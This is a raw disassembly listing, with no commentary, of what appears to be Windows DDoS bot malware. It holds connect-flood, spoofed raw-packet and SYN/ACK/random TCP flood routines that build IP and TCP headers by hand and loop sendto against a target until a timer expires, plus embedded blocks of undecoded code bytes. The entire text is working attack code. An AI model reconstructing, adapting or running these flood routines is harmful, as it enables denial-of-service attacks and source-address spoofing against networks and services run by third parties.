lea eax, [ebp+58h]
push eax
push edi
push 41Ch
push offset byte_4D5278
push dword ptr [ebp+70h]
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_415F4A
inc dword ptr [ebp+7Ch]
loc_415EB1: ; CODE XREF: seg000:00415D8E�j
call esi ; GetTickCount
sub eax, [ebp+6Ch]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+44h]
jbe loc_415D93
push dword ptr [ebp+70h]
call ds:dword_444218 ; closesocket
mov eax, [ebp+7Ch]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div dword ptr [ebp+44h]
shr ecx, 14h
push ecx
push eax
push dword ptr [ebp+7Ch]
lea eax, [ebp-144h]
push eax
lea eax, [ebp-0C4h]
push eax
lea eax, [ebp-348h]
push offset unk_4355C0
push eax
call sub_41E6A6
add esp, 1Ch
cmp [ebp+50h], edi
jnz short loc_415F2D
loc_415F10: ; CODE XREF: seg000:00415CED�j
push edi
push dword ptr [ebp+4Ch]
lea eax, [ebp-348h]
push eax
lea eax, [ebp-44h]
push eax
push dword ptr [ebp-148h]
call sub_40123B
add esp, 14h
loc_415F2D: ; CODE XREF: seg000:00415CE7�j
; seg000:00415F0E�j
lea eax, [ebp-348h]
push eax
call sub_417D70
push dword ptr [ebp+3Ch]
call sub_40B149
pop ecx
pop ecx
push edi
call ds:dword_42B068 ; ExitThread
loc_415F4A: ; CODE XREF: seg000:00415EA8�j
push dword ptr [ebp+70h]
call ds:dword_444218 ; closesocket
call ds:dword_4441C4 ; WSAGetLastError
push eax
push dword ptr [ebp+7Ch]
lea eax, [ebp-144h]
push eax
push offset unk_435578
lea eax, [ebp-348h]
push 200h
push eax
call sub_41E6FE
add esp, 18h
jmp loc_415CE4
; ---------------------------------------------------------------------------
word_415F82 dw 0B855h ; DATA XREF: sub_40274D+524E�o
dd 10320h, 8C246C8Dh, 8A8FE8h, 7C458B00h, 6A575653h, 0F08B5949h
dd 0FF30BD8Dh, 0A5F3FFFFh, 8947FF33h, 120B8h, 5815FF00h
dd 89004441h, 458D7C45h, 15FF50B4h, 44417Ch, 0DB33F08Bh
dd 0FE83C033h, 8D0E75FFh, 0FF50B445h, 44416815h, 74C33B00h
dd 7C7D8306h, 8D5975FFh, 8D50B445h, 0FFFD3085h, 56B468FFh
dd 0E8500043h, 86B2h, 390CC483h, 20754C5Dh, 4875FF53h
dd 0FD30858Dh, 8D50FFFFh, 0FFFF3485h, 0B5FF50FFh, 0FFFFFF30h
dd 0FEB222E8h, 14C483FFh, 0FD30858Dh, 0E850FFFFh, 1D48h
dd 0E84475FFh, 0FFFF5119h, 0E9575959h, 0C5h, 0C74C33Bh
dd 8B0C408Bh, 89008B00h, 3EB7045h, 6A707589h, 54458D1Ch
dd 99E85053h, 83000085h, 0B8FF5C4Dh, 0FFDCh, 390CC483h
dd 37E3845h, 39384589h, 37D3C7Dh, 333C7D89h, 345D39F6h
dd 75FF267Eh, 54458D3Ch, 53501C6Ah, 8D3875FFh, 0FEFD5485h
dd 75FF50FFh, 7C75FF70h, 41F415FFh, 3B460044h, 0DA7C3475h
dd 0FF7C75FFh, 44418C15h, 0B4458D00h, 30858D50h, 68FFFFFDh
dd 435688h, 85E8E850h, 0C4830000h, 4C5D390Ch, 0FF532075h
dd 858D4875h, 0FFFFFD30h, 34858D50h, 50FFFFFFh, 0FF30B5FFh
dd 58E8FFFFh, 83FFFEB1h, 858D14C4h, 0FFFFFD30h, 1C7EE850h
dd 75FF0000h, 504FE844h, 5959FFFFh, 6815FF53h, 0CC0042B0h
dword_416104 dd 310B855h, 6C8D0001h, 0DE88C24h, 8B000089h, 56537C45h
; DATA XREF: sub_40274D+5498�o
dd 59496A57h, 0BD8DF08Bh, 0FFFFFF40h, 0F633A5F3h, 20B08946h
dd 0FF000001h, 42B03815h, 99E85000h, 5900008Bh, 26A116Ah
dd 15FF026Ah, 444100h, 0D88B106Ah, 458DFF33h, 0E8505764h
dd 8498h, 8D0CC483h, 6650C445h, 26445C7h, 7C15FF00h, 83004441h
dd 4589FFF8h, 8D6E757Ch, 0FF50C445h, 44416815h, 75C73B00h
dd 0C4458D59h, 40858D50h, 68FFFFFDh, 435708h, 8510E850h
dd 0C4830000h, 5C7D390Ch, 0FF572075h, 858D5875h, 0FFFFFD40h
dd 44858D50h, 50FFFFFFh, 0FF40B5FFh, 80E8FFFFh, 83FFFEB0h
dd 858D14C4h, 0FFFFFD40h, 1BA6E850h, 75FF0000h, 4F77E854h
dd 5959FFFFh, 130E956h, 408B0000h, 0EB008B0Ch, 7C458D03h
dd 8B507D39h, 68458900h, 0EBE81175h, 9900008Ah, 0FFDCB9h
dd 42F9F700h, 0FF03EB52h, 15FF5075h, 444260h, 66507539h
dd 7D664589h, 50758903h, 0FFFFB8h, 50453900h, 4589037Eh
dd 44458B50h, 59990A6Ah, 7D39F9F7h, 4445894Ch, 75890375h
dd 39F6334Ch, 727E487Dh, 8A9DE8h, 0FFB99900h, 0F7000000h
dd 753B46F9h, 35948848h, 0FFFEFD63h, 56EBE67Ch, 6A444DFFh
dd 106A5E0Bh, 5064458Dh, 8A74E857h, 0A6A0000h, 0F9F75999h
dd 2B48458Bh, 858D50C2h, 0FFFEFD64h, 15FF5350h, 4440CCh
dd 0FF4C75FFh, 42B01415h, 0CE754E00h, 75507D39h, 8A44E819h
dd 0B9990000h, 0FFDCh, 5242F9F7h, 426015FFh, 89660044h
dd 7D396645h, 0FFA57F44h, 458D444Dh, 858D50C4h, 0FFFFFD40h
dd 4356DC68h, 0DBE85000h, 83000083h, 7D390CC4h, 5720755Ch
dd 8D5875FFh, 0FFFD4085h, 858D50FFh, 0FFFFFF44h, 40B5FF50h
dd 0E8FFFFFFh, 0FFFEAF4Bh, 8D14C483h, 0FFFD4085h, 71E850FFh
dd 0FF00001Ah, 42E85475h, 59FFFF4Eh, 15FF5759h, 42B068h
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416311 proc near ; CODE XREF: sub_4163CB+27�p
var_654 = dword ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_14], 2
call ds:dword_444260 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_4163C7
push esi
push edi
mov [ebp+arg_0], eax
mov edi, 190h
loc_41635B: ; CODE XREF: sub_416311+B2�j
xor esi, esi
loc_41635D: ; CODE XREF: sub_416311+77�j
push 0
push 1
push 2
call ds:dword_42B20C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+esi*4+var_654], eax
jz short loc_416385
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_42B1E4 ; ioctlsocket
loc_416385: ; CODE XREF: sub_416311+62�j
inc esi
cmp esi, edi
jl short loc_41635D
xor esi, esi
loc_41638C: ; CODE XREF: sub_416311+91�j
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+esi*4+var_654]
call ds:dword_42B1F4 ; connect
inc esi
cmp esi, edi
jl short loc_41638C
push 64h
call ds:dword_42B014 ; Sleep
xor esi, esi
loc_4163AE: ; CODE XREF: sub_416311+AD�j
push [ebp+esi*4+var_654]
call ds:dword_42B1F8 ; closesocket
inc esi
cmp esi, edi
jl short loc_4163AE
dec [ebp+arg_0]
jnz short loc_41635B
pop edi
pop esi
loc_4163C7: ; CODE XREF: sub_416311+3E�j
xor eax, eax
leave
retn
sub_416311 endp
; =============== S U B R O U T I N E =======================================
sub_4163CB proc near ; CODE XREF: seg000:0041644A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+arg_4]
mov edi, eax
call sub_41E7AD
push [esp+14h+arg_8]
mov ebx, eax
call sub_41E7AD
mov esi, eax
push esi
push ebx
push edi
call sub_416311
add esp, 18h
test eax, eax
jnz short loc_4163FF
inc eax
loc_4163FF: ; CODE XREF: sub_4163CB+31�j
cdq
mov ecx, 3E8h
idiv ecx
pop edi
cdq
idiv esi
pop esi
pop ebx
retn
sub_4163CB endp
; ---------------------------------------------------------------------------
loc_41640E: ; DATA XREF: sub_40274D+4B72�o
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+8]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp-214h]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp-110h]
push eax
lea eax, [ebp-190h]
push eax
lea eax, [ebp-210h]
push eax
call sub_4163CB
push eax
lea eax, [ebp-414h]
push offset dword_435730
push eax
call sub_41E6A6
xor esi, esi
add esp, 18h
cmp [ebp-8], esi
jnz short loc_41648B
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-414h]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-214h]
call sub_40123B
add esp, 14h
loc_41648B: ; CODE XREF: seg000:00416469�j
lea eax, [ebp-414h]
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_4164A9 proc near ; CODE XREF: sub_41677E+3C�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = dword ptr -0B8h
var_B0 = byte ptr -0B0h
var_AF = byte ptr -0AFh
var_9C = byte ptr -9Ch
var_90 = byte ptr -90h
var_88 = byte ptr -88h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = word ptr -62h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+68h+var_B0], bl
lea edi, [ebp+68h+var_AF]
rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call ds:dword_444110 ; WSAStartup
test eax, eax
jz short loc_4164E5
xor eax, eax
jmp loc_416777
; ---------------------------------------------------------------------------
loc_4164E5: ; CODE XREF: sub_4164A9+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_444074 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_41676F
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push ebx
push eax
mov [ebp+68h+var_3C], edi
call ds:dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_416766
push esi
push 10h
lea eax, [ebp+68h+var_4C]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push [ebp+68h+arg_8]
mov [ebp+68h+var_4C], 2
call ds:dword_444260 ; htons
mov esi, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_4A], ax
mov [ebp+68h+var_48], esi
mov [ebp+68h+var_1C], 45h
call ds:dword_444260 ; htons
push [ebp+68h+arg_8]
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_18], di
mov [ebp+68h+var_16], bx
mov [ebp+68h+var_14], 80h
mov [ebp+68h+var_13], 6
mov [ebp+68h+var_12], bx
mov [ebp+68h+var_C], esi
call ds:dword_444260 ; htons
push 4000h
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_28], ebx
mov [ebp+68h+var_24], 50h
mov [ebp+68h+var_23], 2
call ds:dword_444260 ; htons
mov [ebp+68h+var_22], ax
lea eax, [ebp+68h+var_74]
push eax
mov [ebp+68h+var_1E], bx
mov [ebp+68h+var_8], ebx
call ds:dword_42B0DC ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
push [ebp+68h+var_70]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_74]
cdq
push edx
push eax
call sub_420750
add eax, [ebp+68h+var_38]
mov edi, edx
adc edi, [ebp+68h+var_34]
mov [ebp+68h+var_B8], eax
mov [ebp+68h+var_20], bx
call sub_41ECDE
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_444260 ; htons
mov [ebp+68h+var_30], ax
call sub_41ECDE
call sub_41ECDE
push eax
call ds:dword_444260 ; htons
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_2C], eax
call ds:dword_444234 ; htonl
push 14h
pop esi
jmp short loc_41667F
; ---------------------------------------------------------------------------
loc_416617: ; CODE XREF: sub_4164A9+28A�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, edi
jg loc_416762
jl short loc_41663D
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_B8]
jnb loc_416762
loc_41663D: ; CODE XREF: sub_4164A9+186�j
mov [ebp+68h+var_20], bx
call sub_41ECDE
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_444260 ; htons
mov [ebp+68h+var_30], ax
call sub_41ECDE
call sub_41ECDE
push eax
call ds:dword_444260 ; htons
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_2C], eax
call ds:dword_444234 ; htonl
loc_41667F: ; CODE XREF: sub_4164A9+16C�j
inc [ebp+68h+arg_4]
mov [ebp+68h+var_10], eax
mov eax, [ebp+68h+var_C]
push esi
mov [ebp+68h+var_68], eax
mov [ebp+68h+var_64], bl
mov [ebp+68h+var_63], 6
call ds:dword_444260 ; htons
mov [ebp+68h+var_62], ax
mov eax, [ebp+68h+var_10]
mov [ebp+68h+var_6C], eax
lea eax, [ebp+68h+var_6C]
push 20h
push eax
lea eax, [ebp+68h+var_B0]
push eax
call sub_41F400
lea eax, [ebp+68h+var_30]
push esi
push eax
lea eax, [ebp+68h+var_90]
push eax
call sub_41F400
lea eax, [ebp+68h+var_B0]
push 34h
push eax
call sub_402422
mov [ebp+68h+var_20], ax
lea eax, [ebp+68h+var_1C]
push esi
push eax
lea eax, [ebp+68h+var_B0]
push eax
call sub_41F400
lea eax, [ebp+68h+var_30]
push esi
push eax
lea eax, [ebp+68h+var_9C]
push eax
call sub_41F400
push 4
lea eax, [ebp+68h+var_88]
push ebx
push eax
call sub_41E5F0
add esp, 44h
lea eax, [ebp+68h+var_B0]
push 28h
push eax
call sub_402422
mov [ebp+68h+var_12], ax
lea eax, [ebp+68h+var_1C]
push esi
push eax
lea eax, [ebp+68h+var_B0]
push eax
call sub_41F400
add esp, 14h
push 10h
lea eax, [ebp+68h+var_4C]
push eax
push ebx
push 28h
lea eax, [ebp+68h+var_B0]
push eax
push [ebp+68h+var_4]
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_416617
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+68h+var_F8]
push offset unk_43575C
push eax
call sub_41E6A6
lea eax, [ebp+68h+var_F8]
push eax
call sub_417D70
add esp, 10h
jmp short loc_416765
; ---------------------------------------------------------------------------
loc_416762: ; CODE XREF: sub_4164A9+180�j
; sub_4164A9+18E�j
mov ebx, [ebp+68h+var_8]
loc_416765: ; CODE XREF: sub_4164A9+2B7�j
pop esi
loc_416766: ; CODE XREF: sub_4164A9+73�j
push [ebp+68h+var_4]
call ds:dword_444218 ; closesocket
loc_41676F: ; CODE XREF: sub_4164A9+57�j
call ds:dword_444224 ; WSACleanup
mov eax, ebx
loc_416777: ; CODE XREF: sub_4164A9+37�j
pop edi
pop ebx
add ebp, 68h
leave
retn
sub_4164A9 endp
; =============== S U B R O U T I N E =======================================
sub_41677E proc near ; CODE XREF: seg000:00416812�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+arg_4]
mov esi, eax
call sub_41E7AD
push [esp+14h+arg_8]
mov ebx, eax
call sub_41E7AD
mov edi, eax
call sub_41ECDE
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4164A9
add esp, 1Ch
test eax, eax
jnz short loc_4167C7
inc eax
loc_4167C7: ; CODE XREF: sub_41677E+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_41677E endp
; ---------------------------------------------------------------------------
loc_4167D6: ; DATA XREF: sub_40274D+6140�o
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+8]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp-214h]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp-110h]
push eax
lea eax, [ebp-190h]
push eax
lea eax, [ebp-210h]
push eax
call sub_41677E
push eax
lea eax, [ebp-414h]
push offset unk_43577C
push eax
call sub_41E6A6
xor esi, esi
add esp, 18h
cmp [ebp-8], esi
jnz short loc_416853
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-414h]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-214h]
call sub_40123B
add esp, 14h
loc_416853: ; CODE XREF: seg000:00416831�j
lea eax, [ebp-414h]
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_416871 proc near ; CODE XREF: seg000:00416ABF�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 98h
and [ebp+70h+var_88], 0
and [ebp+70h+var_58], 0
push ebx
push esi
push edi
push 4
pop esi
xor eax, eax
xor ecx, ecx
inc ecx
push 6
pop edx
mov ebx, 0FFh
mov [ebp+70h+var_84], ecx
mov [ebp+70h+var_78], edx
lea edi, [ebp+70h+var_54]
mov [ebp+70h+var_80], 2
mov [ebp+70h+var_7C], esi
mov [ebp+70h+var_74], 8
mov [ebp+70h+var_70], 0Ch
mov [ebp+70h+var_6C], 11h
mov [ebp+70h+var_68], 16h
mov [ebp+70h+var_64], 29h
mov [ebp+70h+var_60], 3Ah
mov [ebp+70h+var_5C], ebx
stosd
mov [ebp+70h+var_50], eax
mov [ebp+70h+var_4C], eax
mov [ebp+70h+var_48], eax
mov [ebp+70h+var_3C], edx
mov [ebp+70h+var_34], ecx
mov [ebp+70h+var_30], eax
lea edi, [ebp+70h+var_2C]
mov [ebp+70h+var_44], 2000h
mov [ebp+70h+var_40], esi
mov [ebp+70h+var_38], 3FFFh
stosd
mov edi, 100h
push edi
mov [ebp+70h+var_28], ecx
call sub_41FEB2
pop ecx
push edi
push eax
mov [ebp+70h+var_4], eax
call ds:dword_444220 ; gethostname
push [ebp+70h+var_4]
call ds:dword_444168 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
push ebx
push 3
push 2
mov [ebp+70h+var_C], eax
call ds:dword_444100 ; socket
push esi
lea ecx, [ebp+70h+var_28]
push ecx
push 2
push 0
push eax
mov [ebp+70h+var_4], eax
call ds:dword_444120 ; setsockopt
mov esi, 200h
push esi
call sub_41E5D3
mov edi, ds:dword_42B038
pop ecx
mov [ebp+70h+var_8], eax
call edi ; GetTickCount
mov [ebp+70h+var_10], eax
mov eax, [ebp+70h+arg_0]
push 29Ah
mov [ebp+70h+var_94], eax
mov [ebp+70h+var_98], 2
call ds:dword_444260 ; htons
mov [ebp+70h+var_96], ax
jmp loc_416A4A
; ---------------------------------------------------------------------------
loc_416984: ; CODE XREF: sub_416871+1EA�j
call sub_41ECDE
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+70h+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+70h+var_C], edx
call sub_41ECDE
cdq
mov ecx, ebx
idiv ecx
mov [ebp+70h+var_54], edx
call sub_41ECDE
cdq
mov ecx, 1FA4h
idiv ecx
mov [ebp+70h+var_24], 45h
mov [ebp+70h+var_23], 4
mov [ebp+70h+var_2C], edx
call sub_41ECDE
mov [ebp+70h+var_20], ax
call sub_41ECDE
cdq
push 0Ah
pop ecx
idiv ecx
xor eax, eax
mov ax, word ptr [ebp+edx*4+70h+var_50]
push eax
call ds:dword_444260 ; htons
push esi
mov [ebp+70h+var_1E], ax
call ds:dword_444260 ; htons
mov [ebp+70h+var_22], ax
mov [ebp+70h+var_1C], bl
call sub_41ECDE
cdq
push 0Eh
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+70h+var_88]
mov [ebp+70h+var_1B], al
mov eax, [ebp+70h+var_C]
mov [ebp+70h+var_18], eax
mov eax, [ebp+70h+arg_0]
mov [ebp+70h+var_14], eax
lea eax, [ebp+70h+var_24]
push eax
call sub_402422
mov [ebp+70h+var_1A], ax
push 14h
lea eax, [ebp+70h+var_24]
push eax
push [ebp+70h+var_8]
call sub_41F400
add esp, 14h
push 10h
lea eax, [ebp+70h+var_98]
push eax
push 0
push esi
push [ebp+70h+var_8]
push [ebp+70h+var_4]
call ds:dword_4440CC ; sendto
loc_416A4A: ; CODE XREF: sub_416871+10E�j
call edi ; GetTickCount
sub eax, [ebp+70h+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+70h+arg_4]
jbe loc_416984
push [ebp+70h+var_8]
call sub_41E2A1
pop ecx
push [ebp+70h+var_4]
call ds:dword_444218 ; closesocket
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 70h
leave
retn
sub_416871 endp
; ---------------------------------------------------------------------------
loc_416A7E: ; DATA XREF: sub_40274D+6A89�o
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+8]
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp-194h]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp-110h]
push eax
call sub_41E7AD
pop ecx
push eax
lea eax, [ebp-190h]
push eax
call ds:dword_44417C ; inet_addr
push eax
call sub_416871
push eax
lea eax, [ebp-394h]
push offset dword_4357A4
push eax
call sub_41E6A6
xor esi, esi
add esp, 14h
cmp [ebp-8], esi
jnz short loc_416B00
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-394h]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-194h]
call sub_40123B
add esp, 14h
loc_416B00: ; CODE XREF: seg000:00416ADE�j
lea eax, [ebp-394h]
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
loc_416B1E: ; DATA XREF: sub_40274D+512E�o
push ebp
lea ebp, [esp-74h]
sub esp, 440h
mov eax, [ebp+7Ch]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp-1CCh]
rep movsd
xor esi, esi
inc esi
mov [eax+19Ch], esi
push 0Eh
xor eax, eax
xor ebx, ebx
mov [ebp-2Ch], bl
pop ecx
lea edi, [ebp-2Bh]
rep stosd
stosw
stosb
mov edi, ds:dword_42B038
call edi ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 0FFh
push 3
push 2
call ds:dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+70h], eax
jnz short loc_416BA6
call ds:dword_4441C4 ; WSAGetLastError
push eax
push offset unk_4358C0
loc_416B89: ; CODE XREF: seg000:00416BCA�j
lea eax, [ebp-3CCh]
push eax
call sub_41E6A6
add esp, 0Ch
loc_416B98: ; CODE XREF: seg000:00416BF1�j
; seg000:00416F0C�j
cmp [ebp-34h], ebx
jnz loc_416EBC
jmp loc_416E9C
; ---------------------------------------------------------------------------
loc_416BA6: ; CODE XREF: seg000:00416B7B�j
push 4
lea ecx, [ebp+40h]
push ecx
push 2
push ebx
push eax
mov [ebp+40h], esi
call ds:dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_416BCC
call ds:dword_4441C4 ; WSAGetLastError
push eax
push offset unk_435888
jmp short loc_416B89
; ---------------------------------------------------------------------------
loc_416BCC: ; CODE XREF: seg000:00416BBC�j
lea eax, [ebp-1C8h]
push eax
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_416BF3
lea eax, [ebp-3CCh]
push offset unk_435868
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_416B98
; ---------------------------------------------------------------------------
loc_416BF3: ; CODE XREF: seg000:00416BDC�j
push 10h
lea eax, [ebp+30h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push ebx
mov word ptr [ebp+30h], 2
call ds:dword_444260 ; htons
mov [ebp+32h], ax
lea eax, [ebp-1C8h]
push eax
call ds:dword_44417C ; inet_addr
mov [ebp+34h], eax
mov [ebp+7Ch], ebx
call edi ; GetTickCount
mov [ebp+44h], eax
jmp loc_416E3D
; ---------------------------------------------------------------------------
loc_416C30: ; CODE XREF: seg000:00416E4E�j
push 28h
mov byte ptr [ebp+48h], 45h
call ds:dword_444260 ; htons
cmp [ebp-3Ch], ebx
mov [ebp+4Ah], ax
mov [ebp+4Ch], si
mov [ebp+4Eh], bx
mov byte ptr [ebp+50h], 80h
mov byte ptr [ebp+51h], 6
mov [ebp+52h], bx
jz short loc_416C86
call sub_41ECDE
mov esi, eax
shl esi, 8
call sub_41ECDE
add esi, eax
shl esi, 8
call sub_41ECDE
add esi, eax
shl esi, 8
call sub_41ECDE
add esi, eax
mov [ebp+54h], esi
xor esi, esi
inc esi
jmp short loc_416C9C
; ---------------------------------------------------------------------------
loc_416C86: ; CODE XREF: seg000:00416C57�j
push dword ptr [ebp-1CCh]
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
mov [ebp+54h], eax
loc_416C9C: ; CODE XREF: seg000:00416C84�j
cmp [ebp-44h], ebx
mov eax, [ebp+34h]
mov [ebp+58h], eax
jnz short loc_416CB7
call sub_41ECDE
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_416CBA
; ---------------------------------------------------------------------------
loc_416CB7: ; CODE XREF: seg000:00416CA5�j
push dword ptr [ebp-44h]
loc_416CBA: ; CODE XREF: seg000:00416CB5�j
call ds:dword_444260 ; htons
mov [ebp+5Eh], ax
call sub_41ECDE
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_444260 ; htons
push 12345678h
mov [ebp+5Ch], ax
call ds:dword_444234 ; htonl
mov [ebp+60h], eax
lea eax, [ebp-148h]
push offset aSyn ; "syn"
push eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_416D0A
mov [ebp+64h], ebx
mov byte ptr [ebp+69h], 2
jmp short loc_416D66
; ---------------------------------------------------------------------------
loc_416D0A: ; CODE XREF: seg000:00416CFF�j
lea eax, [ebp-148h]
push offset aAck ; "ack"
push eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_416D2A
mov [ebp+64h], ebx
mov byte ptr [ebp+69h], 10h
jmp short loc_416D66
; ---------------------------------------------------------------------------
loc_416D2A: ; CODE XREF: seg000:00416D1F�j
lea eax, [ebp-148h]
push offset aRandom_0 ; "random"
push eax
call sub_41F090
test eax, eax
pop ecx
